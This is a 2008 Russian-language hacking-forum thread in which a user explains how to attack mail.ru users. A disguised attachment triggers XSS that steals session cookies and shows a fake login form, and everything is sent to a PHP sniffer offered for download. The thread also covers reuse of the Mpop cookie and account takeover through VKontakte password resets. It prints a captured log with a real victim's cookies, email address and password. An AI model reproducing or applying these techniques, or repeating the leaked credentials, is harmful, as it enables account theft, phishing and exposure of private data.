ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
mail.ru: XSS + фейк (2 в 1) |
08.12.2008, 12:57
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
mail.ru: XSS + фейк (2 в 1)
Всем привет 
Возможно байан, и всёже...
XSS нашёл не я, нашёл вот кто http://webxakep.net/articles/articles-internet/1601-krazha-cookies-na-mail.ru.html но там описана тупо XSS а мы сейчас додумаем сами, как сделать всё поумнее...
/*Кстати хочу сказать что почему-то не у всех это работает, у некоторых при отправке атача <script> заменяется на <xscript> возможно это зависит от браузера, у меня опера 9.62 и всё норм*/
Дальше идёт строго моя импровизация
С XSS проблем не будет, надо подумать насчёт фейка... Мы будем выводить страницу входа, надо чтобы мыло отображалось в поле "Имя" ну как стандартный мэйловский вход, для этого надо отпарсить куку "Mpop". Быстро в гуголе нашёл скрипт и взялся за работу
/*Час спустя */
Сделал, из кук читается логин, домен и вводится в форму, также при нажатии на кнопку сабмита изменяется action формы, чтобы в опере не палился сниффер при наводе на кнопку
URL сниффера надо прописать в функцию x3k_get_action() - найдёте её через Ctrl+F (это файл фото)
Автор статьи что я указал выше рекомендует использовать имя файла с расширением .img но это палево, хоть и не большое, но палево, и зачем палиться если этого можно избежать. Способ прибежал в голову секунда за 15
Изменяем формат файла на .jpg Но буква p это не английская ПЭ а русская ЭР, таким образом всё хорошо Но вы возможно придумаете для экономии времени такой способ - заходить в "Отправленные" и перенаправлять время следующей жертве, не советую... При первой отправке если мы отправили "фото.jpg" то он так и придёт жертве, а при перенаправке он превратиться в "foto.jrg" а нам этого не надо, поэтому пишите каждый раз письмо заново.
Код:
http://rapidshare.com/files/171369388/mail.ru_sniff_fake.rar.html
http://depositfiles.com/files/rbmgdj9vw
А архиве 4 файла
.htaccess - запрещает доступ к логу из веба
mail-sniffer.log - сюда будут идти куки с XSS и данные с фейка
mail-sniffer.php - сам сниффер который всё обрабатывает
S000001436.jрg - "кагбе" фотография.
Она весит 22кб, если вам кажется этого мало для фотографии, можете дополнить текстом
Код HTML:
<noscript><!-- много разного мусора на пару десятков/сотен кб --></noscript>
Чёт я ещё хотел сказать... Забыл, вспомню скажу
А! Вспомнил! Если жертва не повелась на фейк, пришли только куки, не всё потеряно, прём на вконтакт (все знают что это, не надо объяснять?) высылаем пасс на мыло (98% жертв зареганы на вконтакте) нам приходит пасс, в 85% случаев пасс подходит к мылу, если не на вконтакте, порыскайте почту, должны быть письма с разными регистрациями и высыланиями паролей
Ах да! Ещё! Если пришли только куки, то удаляйте всё кроме "Mpop" эта кука самая главная и с её помощью вы сможете лазить по всем сервисам mail.ru (чаты, знакомства, игры) если вы оставите ещё какую-то куку то есть вероятность что куда-то вас не пустят
А! Ещё! В PHP скрипте сниффера защита от школьников, так что не забудьте поправить
Ага! Ещё! Зайдите в "фотографию" и в функции "x3k_get_action()" измените URL сниффера
Ну и ещё... На файл mail-sniffer.log должны быть права на запись
Вроде-бы всё
Видео тем кто не догнал 
Код:
http://rapidshare.com/files/171401947/mail.ru_xss_sniff.rar.html
http://depositfiles.com/files/rscltc8se
(c)Ponchik - forum.antichat.ru
Последний раз редактировалось Ponchik; 08.12.2008 в 15:38..
|
|
|
08.12.2008, 13:07
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567
Репутация:
2145
|
|
На яндексе тоже похожая была, там алерты вылетали даже из txt кажись.
Молодец, +++
|
|
|
|
08.12.2008, 13:16
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Тама кстате в PHP скрипте
header("Location: http://win.mail.ru/cgi-bin/movemsg?remove&id=$id");
Вот если 2 раза заставить жертву зайти по этой ссыле письмо удалиться полностью, но я игрался, игрался с картинками на JS, не получилось, не моё это  |
|
|
|
08.12.2008, 13:22
|
|
Постоянный
Регистрация: 17.09.2008
Сообщений: 562
Провел на форуме:
6962560
Репутация:
536
|
|
Перезалейте куда-нить..))
|
|
|
|
08.12.2008, 13:23
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Fepsis, http://depositfiles.com/files/rbmgdj9vw
Перенесите кто-то тему в E-Mail ато я чёто тупанул
|
|
|
|
08.12.2008, 13:43
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Код:
==========================
Прилетело с сниффера (12.08.08 11:36:54)
IP: 213.134.205.214
User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRSPUTNIK 2, 0, 0, 36 SW; MRA 5.1 (build 02243); MAXTHON 2.0)
Ref: http://af6.mail.ru/cgi-bin/readmsg/S000001436.jrg?id=12287289880000026372;0;1&mode=attachment&channel=
Cookie: VID=0QIH4Y15S9Wa; mrcu=2E50492BE75132D7D7D5D6CD86D5; p=n8m/AbnPqgAA; __utma=56108983.1778233777.1227614052.1228484981.1228726826.16; __utmz=56108983.1228484981.15.13.utmccn=(referral)|utmcsr=2.chat.mail.ru|utmcct=/cgi-xml/info|utmcmd=referral; t=obLD1AAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAdABcDvAcA; c240=TR5bSQAAAAKF7QMAAAAAApONAQAAAAAA; c8=94o9SQAAAAH5UgIAAAAAAm0OAQAAAAACkYICAAAAAAKTUwQAAAAAApJJAgAAAAAClX4BAAAA; Mpop=1228728991:424c0163005d0842190502190a1d00041c05034f6a5d5e465e07050501071e0809001e5c4b5757555451145a545858194b44:erofeef@mail.ru:-; __utmc=56108983; ticket=f9469fd8-8e2d-4977-ab40-2c1f10c89e04:erofeef@mail.ru
==========================
Прилетело с фейка (12.08.08 11:37:00)
IP: 213.134.205.214
User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRSPUTNIK 2, 0, 0, 36 SW; MRA 5.1 (build 02243); MAXTHON 2.0)
Ref: http://af6.mail.ru/cgi-bin/readmsg/S000001436.jrg?id=12287289880000026372;0;1&mode=attachment&channel=
Мыло из кук: erofeef@mail.ru
Мыло которое ввела жертва: erofeef@mail.ru
Пасс который ввела жертва: 7771
Стыдно, стыдно  |
|
|
|
08.12.2008, 15:15
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Молодец!!! Хорошая статья =))
Но сейчас будет куча вопросов... Так что лучше видео запиши =)
|
|
|
|
08.12.2008, 15:16
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Tigger, тож думал над этим, щас запишу |
|
|
|
08.12.2008, 15:24
|
|
Участник форума
Регистрация: 24.09.2008
Сообщений: 169
Провел на форуме:
1462512
Репутация:
288
|
|
Молодец интересно.
|
|
|
|
08.12.2008, 15:40
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Снял видео, но тама смареть нечего, щас пойдут вопросы "А я когда открываю 192.168.0.1/O_o у меня пишет невозможно отобразить" и "А где скачать VMware и возможно-ли через неё ломать акки вконтакте" Х_Х
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
